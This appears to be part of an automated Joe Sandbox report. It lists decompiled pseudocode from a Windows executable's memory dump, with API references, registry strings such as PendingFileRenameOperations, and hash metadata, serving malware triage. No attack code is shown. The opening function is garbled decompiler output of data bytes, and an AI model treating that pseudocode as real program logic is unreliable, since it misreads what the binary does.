					L114:
					_t360 = _t360 + 1 + _t360 + 1;
					 *_t420 = es;
					asm("enter 0x40ba, 0x0");
					goto L115;
				} else {
					if(_t556 < 0) {
						L115:
						_push(_t475);
						_t360 = _t360 + _t404 + _t360 + _t404 + _t404;
						_t474 = _t474 + 1;
						_t420 = 0x8540042;
						 *((intOrPtr*)(_t360 + 0x5d)) =  *((intOrPtr*)(_t360 + 0x5d)) + 0x8540042;
						goto L116;
					} else {
						_t480 =  *(_t404 + 0x43) * 0x72746e6f;
						asm("outsd");
						asm("insb");
						_pop(es);
						asm("andps xmm0, [edi+0x72]");
						asm("popad");
						if(_t480 < 0) {
							L116:
							_t360 = _t360 - 1;
							_t424 =  &(_t420[0]);
							 *((intOrPtr*)(_t404 + _t424 * 2)) =  *((intOrPtr*)(_t404 + _t424 * 2)) + _t424;
							 *((intOrPtr*)(_t360 + 8)) =  *((intOrPtr*)(_t360 + 8)) + _t470;
							_t426 = _t424 + 2;
							 *((intOrPtr*)(_t360 + 8)) =  *((intOrPtr*)(_t360 + 8)) + _t426;
							_t427 = _t426 + 1;
							 *((intOrPtr*)(_t480 + 0x41 + _t427 * 4)) =  *((intOrPtr*)(_t480 + 0x41 + _t427 * 4)) + _t427;
							 *((intOrPtr*)(_t480 + _t360 * 4)) =  *((intOrPtr*)(_t480 + _t360 * 4)) + _t427;
							_t428 = _t427 + 1;
							 *((intOrPtr*)(_t480 + _t360 * 4)) =  *((intOrPtr*)(_t480 + _t360 * 4)) + _t428;
							 *((intOrPtr*)(_t360 - 0x3fffbe7e)) =  *((intOrPtr*)(_t360 - 0x3fffbe7e)) + _t360;
							_t475 =  &_a1;
							_t430 = _t428 + 2;
						} else {
							_t480 =  *(_t404 + 0x43) * 0x72746e6f;
							asm("outsd");
							asm("insb");
							asm("aam 0x35");
							 *((intOrPtr*)(_t470 + _t474)) =  *((intOrPtr*)(_t470 + _t474)) + _t470;
							_t430 =  &(_t420[0]);
							 *_t360 =  *_t360 + _t430;
							 *_t360 =  *_t360 + _t430;
							_t404 = _t404 + 1;
							_t558 = _t404;
							asm("outsd");
							asm("outsb");
							if(_t558 != 0) {
								asm("outsd");
								asm("insb");
								if (_t558 >= 0) goto L113;
								 *((intOrPtr*)(_t404 + 0xc0)) =  *((intOrPtr*)(_t404 + 0xc0)) + _t430;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t404;
								asm("aaa");
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								asm("aaa");
								_t459 = _t430 + 2;
								 *_t360 =  *_t360 + _t459;
								asm("aaa");
								_t460 = _t459 + 1;
								 *_t360 =  *_t360 + _t360;
								 *_t360 =  *_t360 + _t360;
								 *_t360 = _t460 +  *_t360;
								_t394 = _t360 ^  *_t460;
								_pop(_t480);
								asm("insd");
								_t420 =  &(_t460[0]);
								 *_t394 =  *_t394 + _t420;
								_t360 = _t394 - 0x40;
								 *((intOrPtr*)(_t360 + 0x2c)) =  *((intOrPtr*)(_t360 + 0x2c)) + _t470;
								goto L114;
							}
						}
					}
				}
				 *((intOrPtr*)(_t474 + 0x41 + _t360 * 2)) =  *((intOrPtr*)(_t474 + 0x41 + _t360 * 2)) + _t470;
				 *((intOrPtr*)(_t480 + _t430 * 2)) =  *((intOrPtr*)(_t480 + _t430 * 2)) + _t470;
				 *((intOrPtr*)(_t480 + _t475 * 2)) =  *((intOrPtr*)(_t480 + _t475 * 2)) + _t470;
				_t432 = _t430 + 2;
				_t364 = _t360 + _t470;
				 *_t432 =  *_t432 + 0x1c;
				 *_t432 =  *_t432 + 0xffffffe8;
				if( *_t432 <= 0) {
					L121:
					_t405 = _t404 + 1;
					asm("outsd");
					asm("outsb");
					if(_t405 == 0) {
						goto L130;
					} else {
						asm("outsd");
						asm("insb");
						_pop(es);
						_push(cs);
						_push(_t480);
						_t405 = _t405 + 1;
						_t565 = _t405;
						if(_t565 != 0) {
							goto L132;
						} else {
							if(_t565 == 0) {
								goto L131;
							} else {
								asm("insd");
								_t405 = _t405 + 1;
								asm("outsd");
								asm("outsb");
								if(_t405 == 0) {
									goto L133;
								} else {
									asm("outsd");
									asm("insb");
									_t364 =  *0x58004136 ^ 0x00090041;
									_t264 = _t405 + 0x6f;
									 *_t264 =  *(_t405 + 0x6f) | _t364;
									_t567 =  *_t264;
									asm("outsb");
									if(_t567 != 0) {
										asm("outsd");
										asm("insb");
										if (_t567 >= 0) goto L127;
										_a64 = _a64 + _t432;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 ^ _t405;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *((intOrPtr*)(_t364 + _t473)) =  *((intOrPtr*)(_t364 + _t473)) + _t405;
										 *((intOrPtr*)(_t364 + _t473)) =  *((intOrPtr*)(_t364 + _t473)) + _t364;
										 *_t364 =  *_t364 + _t364;
										 *_t364 =  *_t364 + _t364;
										 *((intOrPtr*)(_t364 + 0x5c004136)) =  *((intOrPtr*)(_t364 + 0x5c004136)) + _t364;
										asm("insd");
										_t449 =  &(_t432[1]);
										 *_t364 = _t449 +  *_t364;
										_t389 = _t364 - 0x40;
										 *((intOrPtr*)(_t389 + 0x2c)) =  *((intOrPtr*)(_t389 + 0x2c)) + _t470;
										 *_t449 = es;
										asm("enter 0x40ba, 0x0");
										asm("cld");
										_push(_t475);
										_t392 = _t389 + 1 + _t389 + 1 + _t389 + 1 + _t389 + 1;
										_t451 = 0x8540040;
										goto L128;
									}
								}
							}
						}
					}
				} else {
					 *_t364 =  *_t364 + _t364;
					 *_t432 =  *_t432 + 0x28;
					asm("popad");
					 *((intOrPtr*)(_t364 + 0x41 + _t475 * 2)) =  *((intOrPtr*)(_t364 + 0x41 + _t475 * 2)) + _t404;
					 *_t364 =  *_t364 + _t364;
					_t453 =  &(_t432[0]);
					 *((intOrPtr*)(_t364 + 0x67)) =  *((intOrPtr*)(_t364 + 0x67)) + _t453;
					_t454 =  &(_t453[0]);
					 *_t364 = _t454 +  *_t364;
					 *((intOrPtr*)(_t364 + _t475 * 2)) =  *((intOrPtr*)(_t364 + _t475 * 2)) + _t364;
					_t456 =  &(_t454[0]);
					 *((intOrPtr*)(_t473 - 0x730bffbf)) =  *((intOrPtr*)(_t473 - 0x730bffbf)) + _t456;
					_t451 =  &(_t456[0]);
					 *_t364 =  *_t364 + _t404;
					 *_t451 =  *_t451 + E0041839C;
					_t364 = _t451;
					 *_t364 =  *_t364 + _t364;
					asm("verw sp");
					 *_t451 = es;
					_push(cs);
					_push(_t480);
					_t405 = _t404 + 1;
					_t563 = _t405;
					if(_t563 != 0) {
						L129:
						_push(_t480);
						 *_t451 =  *_t451 | _t364;
						asm("clc");
						_t474 = _t474 + 1;
						_t432 = _t451 + 1;
						L130:
						 *((intOrPtr*)(_t364 + 0x5d)) =  *((intOrPtr*)(_t364 + 0x5d)) + _t432;
						_t433 =  &(_t432[0]);
						 *((intOrPtr*)(_t405 + _t433 * 2)) =  *((intOrPtr*)(_t405 + _t433 * 2)) + _t433;
						_t432 = _t433 + 1;
						L131:
						 *((intOrPtr*)(_t364 + 8)) =  *((intOrPtr*)(_t364 + 8)) + _t470;
						L132:
						 *_t432 =  *_t432 | _t364;
						_push(0x84004108);
						L133:
						_t434 =  &(_t432[0]);
						 *((intOrPtr*)(_t480 + _t364 * 4)) =  *((intOrPtr*)(_t480 + _t364 * 4)) + _t434;
						_t432 =  &(_t434[0]);
						 *((intOrPtr*)(_t364 - 0x3fffbe7e)) =  *((intOrPtr*)(_t364 - 0x3fffbe7e)) + _t364;
						_t475 =  &_a1;
					} else {
						if(_t563 == 0) {
							L128:
							_t364 = _t392 + 1;
							 *((intOrPtr*)(_t364 + _t451 + 0x41)) =  *((intOrPtr*)(_t364 + _t451 + 0x41)) + _t470;
							goto L129;
						} else {
							asm("insd");
							goto L121;
						}
					}
				}
				_t435 =  &(_t432[0]);
				 *((intOrPtr*)(_t474 + 0x41 + _t364 * 2)) =  *((intOrPtr*)(_t474 + 0x41 + _t364 * 2)) + _t470;
				 *((intOrPtr*)(_t480 + _t435 * 2)) =  *((intOrPtr*)(_t480 + _t435 * 2)) + _t470;
				do {
					 *((intOrPtr*)(_t480 + _t475 * 2)) =  *((intOrPtr*)(_t480 + _t475 * 2)) + _t470;
					_t435 = _t435 + 2;
					_t365 = _t364 + _t470;
					 *_t435 =  *_t435 + 0x1c;
					 *_t435 =  *_t435 + 0xffffffe8;
					if( *_t435 > 0) {
						_t365->i = _t365 + _t365->i;
						 *_t435 =  *_t435 + 0x28;
						asm("popad");
						_t440 = _t435 + 1;
						 *((intOrPtr*)(_t365 + 0x41 + _t475 * 2)) =  *((intOrPtr*)(_t365 + 0x41 + _t475 * 2)) + _t405;
						 *((intOrPtr*)(_t470 + _t440 * 4)) =  *((intOrPtr*)(_t470 + _t440 * 4)) + _t365;
						_t441 = _t440 + 1;
						 *((intOrPtr*)(_t365 + 0x67)) =  *((intOrPtr*)(_t365 + 0x67)) + _t441;
						_t442 = _t441 + 1;
						_t365->i = _t365->i + _t442;
						 *((intOrPtr*)(_t365 + _t475 * 2)) =  *((intOrPtr*)(_t365 + _t475 * 2)) + _t365;
						_t444 = _t442 + 2;
						 *((intOrPtr*)(_t473 - 0x730bffbf)) =  *((intOrPtr*)(_t473 - 0x730bffbf)) + _t444;
						_t445 = _t444 + 1;
						_t365->i = _t365->i + _t405;
						 *_t445 =  *_t445 + E0041839C;
						 *(_t470 - 0x7443ffbf) =  *(_t470 - 0x7443ffbf) ^ _t445;
						_t435 = _t445 + 1;
						_t365 =  *_t435;
						_t365->i = _t365 + _t365->i;
						asm("adc dh, [eax+0x418b30]");
					}
					_t470 = _t470 |  *(_t365 + 0x69 + _t435 * 2);
					asm("outsb");
					if(_t470 == 0) {
						L143:
						asm("lock mov eax, [ebp+0x8]");
						if((GetWindowLongA(_t365, ??) & 0x40000000) != 0 && GetWindowLongA(_a8, 0xfffffff4) == 0) {
							SetWindowLongA(_a8, 0xfffffff4, _a8);
						}
						_t367 =  *0x48c2dc; // 0x0
						_push(_t367);
						_push( *0x48d5c8 & 0x0000ffff);
					} else {
						goto L138;
					}
					L147:
					SetPropA(_a8, ??, ??);
					_t371 =  *0x48c2dc; // 0x0
					SetPropA(_a8,  *0x48d5c6 & 0x0000ffff, _t371);
					_t375 =  *0x48c2dc; // 0x0
					 *0x48c2dc = 0; // executed
					_v4 =  *((intOrPtr*)(_t375 + 0xa8))(_a8, _a12, _a16, _a20);
					return  *_t405;
					L138:
					_push(_t480);
					_t364 = _t365 - 1;
					_t475 =  *(_t474 + 0x74) * 0x646e6957;
					asm("outsd");
				} while (_t475 > 0);
				asm("aaa");
				 *_t364 =  *_t364 + _t405;
				asm("aaa");
				_t439 = _t435 + 2;
				 *_t439 =  *_t439 + _t439;
				 *_t364 =  *_t364 + _t439;
				_t405 = _t405 + 1;
				_t580 = _t405;
				asm("outsd");
				asm("outsb");
				if(_t580 != 0) {
					asm("outsd");
					asm("insb");
					if (_t580 >= 0) goto L141;
					 *((intOrPtr*)(_t405 - 0x1374aa40)) =  *((intOrPtr*)(_t405 - 0x1374aa40)) + _t439;
					_push(_t475);
					_push(_t439);
					_push(_t405);
					_t405 =  &_v24;
					_t383 =  *0x48c2dc; // 0x0
					 *((intOrPtr*)(_t383 + 0xc0)) = _v12;
					_t384 =  *0x48c2dc; // 0x0
					_t365 = SetWindowLongA(_v12, 0xfffffffc,  *(_t384 + 0xa8));
					_push(0xfffffff0);
					goto L143;
				}
				goto L147;
			}

0x00413438
0x00413438
0x00413438
0x00413438
0x00413438
0x00413439
0x0041343b
0x0041347f
0x0041347f
0x004134c2
0x00413481
0x00413481
0x00000000
0x00413481
0x0041343d
0x0041343d
0x0041343f
0x00413482
0x00413482
0x00413484
0x00413441
0x00413441
0x00413444
0x00413445
0x00413445
0x0041344b
0x0041348e
0x00413508
0x00413490
0x00413490
0x00413491
0x00413491
0x00413491
0x00000000
0x00413491
0x0041344d
0x0041344d
0x0041344f
0x00413492
0x00413492
0x00413493
0x004134d6
0x0041351a
0x0041351b
0x00000000
0x0041351d
0x0041351d
0x00000000
0x0041351d
0x004134d9
0x004134d9
0x004134d9
0x004134d9
0x00000000
0x004134d9
0x00413495
0x00413495
0x00413495
0x00000000
0x00413495
0x00413451
0x00413451
0x00413453
0x00413496
0x00413496
0x00413497
0x004134da
0x004134da
0x004134db
0x0041351e
0x0041351e
0x00000000
0x004134dd
0x004134dd
0x004134dd
0x004134dd
0x00000000
0x004134dd
0x00413499
0x00413499
0x0041349b
0x004134de
0x004134de
0x004134df
0x00413522
0x00413522
0x00413524
0x004134e1
0x004134e1
0x00000000
0x004134e1
0x0041349d
0x0041349d
0x0041349d
0x0041349d
0x00000000
0x0041349d
0x0041349b
0x00413455
0x00413455
0x00413458
0x00413459
0x0041345b
0x0041349e
0x0041349e
0x004134a3
0x004134e6
0x004134e6
0x004134e9
0x004134eb
0x0041352e
0x0041352f
0x00000000
0x00413531
0x00413531
0x00000000
0x00413531
0x004134ed
0x004134ed
0x004134ef
0x00413532
0x00413532
0x00413533
0x00000000
0x00413535
0x00413535
0x00000000
0x00413535
0x004134f1
0x004134f1
0x004134f1
0x00000000
0x004134f1
0x004134ef
0x004134a5
0x004134a5
0x00000000
0x004134a5
0x0041345d
0x0041345d
0x00413461
0x00413463
0x004134a6
0x004134a6
0x004134a9
0x004134ac
0x004134ad
0x004134ad
0x004134ad
0x00000000
0x00413465
0x00413465
0x00413468
0x00413469
0x0041346b
0x004134ae
0x004134ae
0x004134af
0x004134f2
0x004134f2
0x004134f3
0x00413536
0x00413536
0x00413538
0x00413539
0x0041353a
0x0041353c
0x0041353d
0x0041353e
0x00413542
0x00413542
0x00413542
0x00413546
0x00413547
0x00413547
0x0041354a
0x0041354e
0x0041354f
0x00413550
0x00413551
0x00413552
0x004135c6
0x004135c6
0x004135c7
0x004135c9
0x004135cb
0x004135cf
0x004135d1
0x004135d4
0x00000000
0x00413554
0x00413554
0x00413555
0x00413558
0x00413559
0x0041355d
0x0041355e
0x0041355e
0x0041355f
0x00413560
0x00413561
0x004135d5
0x004135d5
0x004135db
0x00000000
0x00413563
0x00413563
0x00413564
0x00413565
0x00413566
0x00413569
0x0041356a
0x0041356d
0x0041356f
0x0041356f
0x0041356f
0x00413572
0x00413572
0x00413573
0x004135e7
0x004135e7
0x004135ed
0x004135ef
0x004135f2
0x004135f3
0x004135f6
0x004135f7
0x004135fe
0x004135ff
0x00000000
0x00413575
0x00413575
0x00413576
0x00413576
0x00413577
0x00413579
0x00413579
0x0041357a
0x0041357b
0x00413582
0x00413584
0x00413586
0x00413588
0x0041358a
0x0041358c
0x00413592
0x00413594
0x00413594
0x00413597
0x00413598
0x004135dd
0x004135e3
0x004135e5
0x004135e6
0x00000000
0x0041359a
0x0041359a
0x0041359b
0x0041359c
0x00413603
0x00413603
0x00413609
0x0041360a
0x0041360b
0x0041360f
0x00413612
0x00413613
0x0041359e
0x0041359e
0x004135a0
0x004135a2
0x004135a4
0x004135a6
0x004135a8
0x004135a9
0x004135ab
0x004135ad
0x004135af
0x004135b1
0x004135b3
0x004135b7
0x004135ba
0x004135bb
0x004135c2
0x004135c3
0x00000000
0x004135c3
0x0041359e
0x0041359c
0x00413598
0x00413573
0x00413561
0x004134f5
0x004134f5
0x00000000
0x004134f5
0x004134b1
0x004134b1
0x004134b1
0x00000000
0x004134b1
0x0041346d
0x0041346d
0x0041346f
0x004134b2
0x004134b2
0x004134b3
0x004134f6
0x004134f6
0x004134f8
0x004134b5
0x004134b5
0x00000000
0x004134b5
0x00413471
0x00413471
0x00413473
0x004134b6
0x004134b6
0x00413475
0x00413475
0x00413477
0x004134ba
0x00413479
0x00413479
0x0041347b
0x004134be
0x0041347d
0x0041347d
0x0041347d
0x0041347d
0x00000000
0x0041347d
0x0041347b
0x00413477
0x00413473
0x0041346f
0x0041346b
0x00413463
0x0041345b
0x00413453
0x0041344f
0x0041344b
0x0041343f
0x00413614
0x00413618
0x0041361b
0x0041361f
0x00413625
0x00413626
0x00413627
0x0041362d
0x0041362f
0x00413632
0x00413633
0x00413635
0x00413636
0x00413636
0x00413637
0x0041369a
0x0041369b
0x0041369d
0x004136a0
0x00000000
0x00413639
0x00413639
0x004136a3
0x004136a5
0x004136af
0x004136b1
0x004136b2
0x004136b3
0x00000000
0x0041363b
0x0041363b
0x00413642
0x00413643
0x00413644
0x00413645
0x00413649
0x0041364a
0x004136b4
0x004136b4
0x004136b6
0x004136b7
0x004136bb
0x004136be
0x004136bf
0x004136c2
0x004136c3
0x004136c7
0x004136ca
0x004136cb
0x004136cf
0x004136d5
0x004136d6
0x0041364c
0x0041364c
0x00413653
0x00413654
0x00413655
0x00413658
0x0041365b
0x0041365c
0x0041365e
0x00413660
0x00413660
0x00413661
0x00413662
0x00413663
0x00413665
0x00413666
0x00413667
0x00413669
0x0041366f
0x00413671
0x00413673
0x00413675
0x00413677
0x00413679
0x0041367b
0x0041367d
0x0041367f
0x00413681
0x00413682
0x00413683
0x00413685
0x00413686
0x00413687
0x00413689
0x0041368b
0x0041368d
0x00413690
0x00413691
0x00413692
0x00413693
0x00413695
0x00413697
0x00000000
0x00413697
0x00413663
0x0041364a
0x00413639
0x004136d7
0x004136db
0x004136df
0x004136e2
0x004136e3
0x004136e5
0x004136e9
0x004136ed
0x00413730
0x00413730
0x00413731
0x00413732
0x00413733
0x00000000
0x00413735
0x00413735
0x00413736
0x00413738
0x00413739
0x0041373a
0x0041373b
0x0041373b
0x0041373c
0x00000000
0x0041373e
0x0041373e
0x00000000
0x00413740
0x00413740
0x00413741
0x00413742
0x00413743
0x00413744
0x00000000
0x00413746
0x00413746
0x00413747
0x0041374d
0x00413752
0x00413752
0x00413752
0x00413755
0x00413756
0x00413758
0x00413759
0x0041375a
0x0041375c
0x00413762
0x00413764
0x00413766
0x00413768
0x0041376b
0x0041376d
0x0041376f
0x00413771
0x00413773
0x00413777
0x0041377b
0x0041377d
0x0041377f
0x00413785
0x00413786
0x00413787
0x00413789
0x0041378b
0x00413791
0x00413794
0x00413798
0x00413799
0x0041379b
0x0041379d
0x00000000
0x0041379d
0x00413756
0x00413744
0x0041373e
0x0041373c
0x004136ef
0x004136ef
0x004136f1
0x004136f5
0x004136f7
0x004136fb
0x004136fd
0x004136ff
0x00413702
0x00413703
0x00413707
0x0041370a
0x0041370b
0x00413712
0x00413713
0x00413715
0x0041371d
0x00413720
0x00413722
0x00413725
0x00413728
0x00413729
0x0041372a
0x0041372a
0x0041372b
0x004137a0
0x004137a0
0x004137a1
0x004137a4
0x004137a5
0x004137a6
0x004137a7
0x004137a7
0x004137aa
0x004137ab
0x004137ae
0x004137af
0x004137af
0x004137b1
0x004137b1
0x004137b4
0x004137b8
0x004137be
0x004137bf
0x004137c2
0x004137c3
0x004137c9
0x0041372d
0x0041372d
0x0041379e
0x0041379e
0x0041379f
0x00000000
0x0041372f
0x0041372f
0x00000000
0x0041372f
0x0041372d
0x0041372b
0x004137ca
0x004137cb
0x004137cf
0x004137d2
0x004137d3
0x004137d6
0x004137d7
0x004137d9
0x004137dd
0x004137e1
0x004137e3
0x004137e5
0x004137e9
0x004137ea
0x004137eb
0x004137ef
0x004137f2
0x004137f3
0x004137f6
0x004137f7
0x004137fb
0x004137fe
0x004137ff
0x00413806
0x00413807
0x00413809
0x00413810
0x00413816
0x00413819
0x0041381c
0x0041381e
0x0041381e
0x00413824
0x00413828
0x00413829
0x00413882
0x00413882
0x00413891
0x004138ac
0x004138ac
0x004138b1
0x004138b6
0x004138be
0x00000000
0x00000000
0x00000000
0x004138bf
0x004138c3
0x004138c8
0x004138da
0x004138eb
0x004138f1
0x00413901
0x00413909
0x0041382b
0x00413832
0x00413833
0x00413834
0x0041383b
0x0041383b
0x0041383e
0x00413840
0x00413842
0x00413843
0x00413844
0x00413846
0x00413848
0x00413848
0x00413849
0x0041384a
0x0041384b
0x0041384d
0x0041384e
0x0041384f
0x00413851
0x00413854
0x00413857
0x00413858
0x00413859
0x0041385c
0x00413864
0x0041386a
0x0041387c
0x00413881
0x00000000
0x00413881
0x00000000

APIs

SetWindowLongA.USER32 ref: 0041387C
GetWindowLongA.USER32 ref: 00413887
GetWindowLongA.USER32 ref: 00413899
SetWindowLongA.USER32 ref: 004138AC
SetPropA.USER32(?,00000000,00000000), ref: 004138C3
SetPropA.USER32(?,00000000,00000000), ref: 004138DA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 33bdcee2bb7d5808a0f6ca2336a2ceab4e619e4ec463797d4acc50d747e952f4
Instruction ID: 1fa71452372a4662785078c80e95b641273a11410cab06b624535b13854e04e1
Opcode Fuzzy Hash: 33bdcee2bb7d5808a0f6ca2336a2ceab4e619e4ec463797d4acc50d747e952f4
Instruction Fuzzy Hash: 6D22DF6148E3C05FE71B8B748D6A5D17FA0AE2372572D45DFC4C28B1A3D21D8A87C72A

Uniqueness

Uniqueness Score: -1.00%

Function 00413854 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00413854(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t19;
				void* _t20;
				struct HWND__* _t23;
				void* _t25;
				void* _t29;
				void* _t33;
				intOrPtr* _t41;

				_t41 =  &_v8;
				_t19 =  *0x48c2dc; // 0x0
				 *((intOrPtr*)(_t19 + 0xc0)) = _a4;
				_t20 =  *0x48c2dc; // 0x0
				_t23 = SetWindowLongA(_a4, 0xfffffffc,  *(_t20 + 0xa8));
				_push(0xfffffff0);
				asm("lock mov eax, [ebp+0x8]");
				if((GetWindowLongA(_t23, ??) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t25 =  *0x48c2dc; // 0x0
				SetPropA(_a4, ??, ??);
				_t29 =  *0x48c2dc; // 0x0
				SetPropA(_a4,  *0x48d5c6 & 0x0000ffff, _t29);
				_t33 =  *0x48c2dc; // 0x0
				 *0x48c2dc = 0; // executed
				_v8 =  *((intOrPtr*)(_t33 + 0xa8))(_a4, _a8, _a12, _a16,  *0x48d5c8 & 0x0000ffff, _t25);
				return  *_t41;
			}

0x00413859
0x0041385c
0x00413864
0x0041386a
0x0041387c
0x00413881
0x00413882
0x00413891
0x004138ac
0x004138ac
0x004138b1
0x004138c3
0x004138c8
0x004138da
0x004138eb
0x004138f1
0x00413901
0x00413909

APIs

SetWindowLongA.USER32 ref: 0041387C
GetWindowLongA.USER32 ref: 00413887
GetWindowLongA.USER32 ref: 00413899
SetWindowLongA.USER32 ref: 004138AC
SetPropA.USER32(?,00000000,00000000), ref: 004138C3
SetPropA.USER32(?,00000000,00000000), ref: 004138DA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 65add3e921d009626a4ebe3be2d81015faf232336a88815e6a4ad0d8fd8a02bf
Instruction ID: 4199b02d80d8a211d8eb305604657171f8b5533d28c55a541e1fe8df20ef1375
Opcode Fuzzy Hash: 65add3e921d009626a4ebe3be2d81015faf232336a88815e6a4ad0d8fd8a02bf
Instruction Fuzzy Hash: 0A11CE75501148BFDF00EF99DC84E9A37E9AB08364F108569F914DB2E1D735D950CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00453B8C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 141
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00453B8C(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v112;
				char _v4208;
				char _v4212;
				char _v4216;
				void* _t40;
				void* _t49;
				void* _t61;
				void* _t69;
				void* _t79;
				void* _t85;
				void* _t103;
				void* _t104;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t117;
				void* _t127;
				void* _t128;
				intOrPtr _t130;

				_t127 = _t128;
				_push(__eax);
				_t130 = _t128 + 0xffffffffffffef90;
				_v4212 = 0;
				_v4216 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x453d63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				_t40 = E0043021C( &_v112);
				_push(_t127);
				_push(0x453d23);
				_push( *[fs:edx]);
				 *[fs:edx] = _t130;
				if(E0042DB78(_t40) == 0) {
					E0042D8B4( &_v4216);
					E0042C614(_v4216,  &_v4212);
					E00403708( &_v20, "WININIT.INI", _v4212);
					_t49 = E0042CE14(__eflags);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L12;
					} else {
						_v24 = E0044FF24(_v20, 1, 1, 0, 2);
						__eflags = 0;
						_push(_t127);
						_push(0x453d12);
						_push( *[fs:edx]);
						 *[fs:edx] = _t130;
						while(1) {
							_t61 = E0045012C(_v24, 0x1000,  &_v4208);
							__eflags = _t61;
							if(_t61 == 0) {
								break;
							}
							E00430244( &_v112, _t61,  &_v4208);
						}
						__eflags = 0;
						_pop(_t117);
						 *[fs:eax] = _t117;
						_push(0x453d19);
						return E00402CA0(_v24);
					}
				} else {
					_t69 = E0042DD88(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v12, 1, 0); // executed
					if(_t69 == 0) {
						if(E0042DCC4() != 0) {
							_push(E004036BC(_v16));
							_t85 = E0040388C( &_v16);
							_pop(_t104);
							E00430244( &_v112, _t104, _t85);
						}
						if(E0042DCC4() != 0) {
							_push(E004036BC(_v16));
							_t79 = E0040388C( &_v16);
							_pop(_t103);
							E00430244( &_v112, _t103, _t79);
						}
						RegCloseKey(_v12);
					}
					L12:
					_pop(_t109);
					 *[fs:eax] = _t109;
					E004302F4( &_v112, _v8);
					_pop(_t111);
					 *[fs:eax] = _t111;
					_push(0x453d6a);
					E00403568( &_v4216, 2);
					return E00403568( &_v20, 2);
				}
			}

0x00453b8d
0x00453b95
0x00453b96
0x00453b9e
0x00453ba4
0x00453baa
0x00453bad
0x00453bb0
0x00453bb5
0x00453bb6
0x00453bbb
0x00453bbe
0x00453bc4
0x00453bcb
0x00453bcc
0x00453bd1
0x00453bd4
0x00453bde
0x00453c79
0x00453c8a
0x00453c9d
0x00453ca5
0x00453caa
0x00453cac
0x00000000
0x00453cae
0x00453cc3
0x00453cc6
0x00453cc8
0x00453cc9
0x00453cce
0x00453cd1
0x00453cd4
0x00453ce2
0x00453ce7
0x00453ce9
0x00000000
0x00000000
0x00453cf5
0x00453cf5
0x00453cfc
0x00453cfe
0x00453d01
0x00453d04
0x00453d11
0x00453d11
0x00453be4
0x00453bf8
0x00453bff
0x00453c17
0x00453c21
0x00453c25
0x00453c2f
0x00453c30
0x00453c30
0x00453c47
0x00453c51
0x00453c55
0x00453c5f
0x00453c60
0x00453c60
0x00453c69
0x00453c69
0x00453d19
0x00453d1b
0x00453d1e
0x00453d33
0x00453d3a
0x00453d3d
0x00453d40
0x00453d50
0x00453d62
0x00453d62

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00453D23,?,00000000,00453D63), ref: 00453C69

Strings

PendingFileRenameOperations, xrefs: 00453C08
PendingFileRenameOperations2, xrefs: 00453C38
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453BEC
WININIT.INI, xrefs: 00453C98

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

